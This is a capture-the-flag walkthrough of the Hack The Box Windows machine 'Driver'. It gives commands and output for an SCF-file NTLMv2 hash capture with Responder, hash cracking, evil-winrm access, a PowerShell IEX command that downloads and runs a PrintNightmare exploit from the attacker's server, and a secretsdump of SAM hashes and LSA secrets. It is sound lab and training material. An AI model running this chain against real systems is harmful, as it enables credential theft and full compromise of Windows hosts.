Hack-The-Box-walkthrough[Driver]

Posted on Edited on In Views: Word count in article: 1.1k Reading time ≈ 4 mins.

introduce

OS: Windows
Difficulty: Easy
Points: 20
Release: 02 Oct 2021
IP: 10.10.11.106

  • my htb rank

Enumeration

Nmap

1
2
3
4
5
6
7
8
┌──(root💀kali)-[~/hackthebox/machine/driver]
└─# nmap -sV -v -p- --min-rate=10000 10.10.11.106
PORT     STATE SERVICE      VERSION
80/tcp   open  http         Microsoft IIS httpd 10.0
135/tcp  open  msrpc        Microsoft Windows RPC
445/tcp  open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows

web

we are greeted with a pop up for login and admin/admin got me it.

so over here it seems like we can upload a malicious firmware and get rev shell

so after looking for exploits I could not get any but the thing was, it was probably saving the files in the smb share of windows.

So here we are having remote file upload and we can then perform SMB Exploit via NTLM Capture

  • SMB Penetration Testing Port 445

  • SMB - SCF File Attacks - NetNTLMv2 hash grab

crate file @shell.scf

1
2
3
4
5
[Shell]
Command=2
IconFile=\\10.10.14.18\share\test.ico
[Taskbar]
Command=ToggleDesktop

start responder and

1
responder -wrf --lm -v -I tun0

upload the file via website

wait and get the hash

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
┌──(root💀kali)-[~/hackthebox/machine/driver]
└─# responder -wrf --lm -v -I tun0                                                                                                
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.0.6.0

  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CTRL-C


[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    DNS/MDNS                   [ON]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [ON]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [ON]
    Fingerprint hosts          [ON]

[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.10.14.18]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP']

[+] Current Session Variables:
    Responder Machine Name     [WIN-M7QNFNTIUS5]
    Responder Domain Name      [DF9J.LOCAL]
    Responder DCE-RPC Port     [46013]

[+] Listening for events...                                                                                                       

[SMB] NTLMv2 Client   : 10.10.11.106
[SMB] NTLMv2 Username : DRIVER\tony
[SMB] NTLMv2 Hash     : tony::DRIVER:5d8b8082ef776c2f:A4327A2CB72A96CEEF1D04DB2636CFD0:010100000000000003D6341085B8D7014158EED0F177C50C00000000020000000000000000000000                                                                                             
[SMB] NTLMv2 Client   : 10.10.11.106
[SMB] NTLMv2 Username : DRIVER\tony
[SMB] NTLMv2 Hash     : tony::DRIVER:d749730738bd8506:D1A35D9A4D7ABF916EECA6D6DE25B8A2:01010000000000003E05281185B8D7012A802D00F1FA40CD00000000020000000000000000000000                                                                                             
[SMB] NTLMv2 Client   : 10.10.11.106
[SMB] NTLMv2 Username : DRIVER\tony
[SMB] NTLMv2 Hash     : tony::DRIVER:bd3860c306965ce9:1A699EF18915FF2D76CB965CB4F7E914:0101000000000000511B141285B8D7013F3164731463EC4A00000000020000000000000000000000                                                                                             
[SMB] NTLMv2 Client   : 10.10.11.106
[SMB] NTLMv2 Username : DRIVER\tony
[SMB] NTLMv2 Hash     : tony::DRIVER:c92c9da2314211e4:DCA91CAF8B4ADFB918B987CA6226FD6A:0101000000000000FF16001385B8D70184E50D8129DC7EE500000000020000000000000000000000                                                                                             
[SMB] NTLMv2 Client   : 10.10.11.106
[SMB] NTLMv2 Username : DRIVER\tony
[SMB] NTLMv2 Hash     : tony::DRIVER:352a6a321addb118:B201C24A20A2010D1B280F4EC2A6380A:01010000000000003CBDE91385B8D7017D6ACD474960E4F800000000020000000000000000000000                                                                                             
[SMB] NTLMv2 Client   : 10.10.11.106
[SMB] NTLMv2 Username : DRIVER\tony
[SMB] NTLMv2 Hash     : tony::DRIVER:7e2adbd91e974841:6E1A74933AE2E19D06C8C03F61D44A89:0101000000000000836BD31485B8D70118B057D21124042400000000020000000000000000000000                                                                                             
[SMB] NTLMv2 Client   : 10.10.11.106
[SMB] NTLMv2 Username : DRIVER\tony
[SMB] NTLMv2 Hash     : tony::DRIVER:9d11f8dc195ba210:633773D52C813CC8C252F5F100B67287:0101000000000000340ABD1585B8D701B38BD32127FADDD500000000020000000000000000000000

hashcat id: 5600

1
tony::DRIVER:5d8b8082ef776c2f:A4327A2CB72A96CEEF1D04DB2636CFD0:010100000000000003D6341085B8D7014158EED0F177C50C00000000020000000000000000000000

cracked

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
hashcat64.exe -a 0 -m 5600 password.txt rockyou.txt

TONY::DRIVER:5d8b8082ef776c2f:a4327a2cb72a96ceef1d04db2636cfd0:010100000000000003d6341085b8d7014158eed0f177c50c00000000020000000000000000000000:liltony

Session..........: hashcat
Status...........: Cracked
Hash.Type........: NetNTLMv2
Hash.Target......: TONY::DRIVER:5d8b8082ef776c2f:a4327a2cb72a96ceef1d0...000000
Time.Started.....: Sun Oct 03 19:56:45 2021 (1 sec)
Time.Estimated...: Sun Oct 03 19:56:46 2021 (0 secs)
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#2.........: 31819.1 kH/s (6.38ms) @ Accel:1024 Loops:1 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 1048576/14344360 (7.31%)
Rejected.........: 0/1048576 (0.00%)
Restore.Point....: 0/14344360 (0.00%)
Restore.Sub.#2...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#2....: 123456 -> Leslie08
Hardware.Mon.#2..: Temp: 49c Util:  6% Core:1632MHz Mem:3802MHz Bus:16

Started: Sun Oct 03 19:56:42 2021
Stopped: Sun Oct 03 19:56:48 2021

tony/liltony

use evil-winrm to login

1
2
3
4
5
6
7
8
9
10
11
12
┌──(root💀kali)-[~/hackthebox/machine/driver]
└─# evil-winrm -i 10.10.11.106 -u tony -p liltony

Evil-WinRM shell v2.4

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\tony\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\tony\Desktop> whoami
driver\tony
*Evil-WinRM* PS C:\Users\tony\Desktop> cat user.txt
a605c8dc202b75b68359640f43d14212

root

by running winpeas, there is a system service running spoolsv which is print spooler service

exploit as we need local privilege escalation

  • CVE-2021-1675 - PrintNightmare LPE - PowerShell

  • Playing with PrintNightmare - 0xdf

Following the steps gives error that running scripts is disabled.

For this, getting a meterpreter shell too won’t work, you can import the module but you can’t then run Invoke-Nightmare. The shell will die.

workaround

spin a local web server and download it then and it will then import it automatically

1
2
3
4
5
6
*Evil-WinRM* PS C:\Users\tony\Desktop> IEX(New-Object Net.Webclient).downloadstring('http://10.10.14.18/CVE-2021-1675.ps1')
*Evil-WinRM* PS C:\Users\tony\Desktop> Invoke-Nightmare -NewUser "luci" -NewPassword "luci11"
[+] created payload at C:\Users\tony\AppData\Local\Temp\nightmare.dll
[+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_f66d9eed7e835e97\Amd64\mxdwdrv.dll"
[+] added user luci as local administrator
[+] deleting payload from C:\Users\tony\AppData\Local\Temp\nightmare.dll

and we are administrator now:

1
2
3
4
5
6
7
8
9
10
11
┌──(root💀kali)-[~/hackthebox/machine/driver]
└─# evil-winrm -i 10.10.11.106 -u luci -p luci11                                                                                  

Evil-WinRM shell v2.4

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\luci\Documents> whoami
driver\luci
*Evil-WinRM* PS C:\Users\luci\Documents> cat \Users\Administrator\Desktop\root.txt
d93ef08c4ef67ae0ae771a2048ca6e75

get administrator’s ntlm hash

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
┌──(root💀kali)-[~/hackthebox/machine/driver]
└─# secretsdump.py luci@10.10.11.106
Impacket v0.9.23.dev1+20210504.123629.24a0ae6f - Copyright 2020 SecureAuth Corporation

Password: luci11
[*] Service RemoteRegistry is in stopped state
[*] Service RemoteRegistry is disabled, enabling it
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xe5b3cda034afd685bc69ccd3c4e9387c
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d1256cff8b5b5fdb8c327d3b6c3f5017:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
tony:1003:aad3b435b51404eeaad3b435b51404ee:dfdb5b520de42ca5d1b84ce61553d085:::
luci:1004:aad3b435b51404eeaad3b435b51404ee:b7e822b81dec47522161ecad82d1aaef:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] DefaultPassword 
DRIVER\tony:liltony
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x68d8efd1bd3fa3ab206268f0bbc6e2a4a5e4b43e
dpapi_userkey:0x68060403e8f0276a683ad704b45dc7b850d9722f
[*] Cleaning up... 
[*] Stopping service RemoteRegistry
[*] Restoring the disabled state for service RemoteRegistry

Summary of knowledge

  • SMB Penetration Testing Port 445
  • SMB - SCF File Attacks - NetNTLMv2 hash grab by using responder
  • ntlmv2 hash cracking using hashcat
  • evil-winrm shell usage
  • CVE-2021-1675 - PrintNightmare LPE - PowerShell
  • using secretsdump.py dumping administrator’s ntlm hash

Contact me

  • QQ: 1185151867
  • twitter: https://twitter.com/fdlucifer11
  • github: https://github.com/FDlucifer

I’m lUc1f3r11, a ctfer, reverse engineer, ioter, red teamer, coder, gopher, pythoner, AI lover, security reseacher, hacker, bug hunter and more…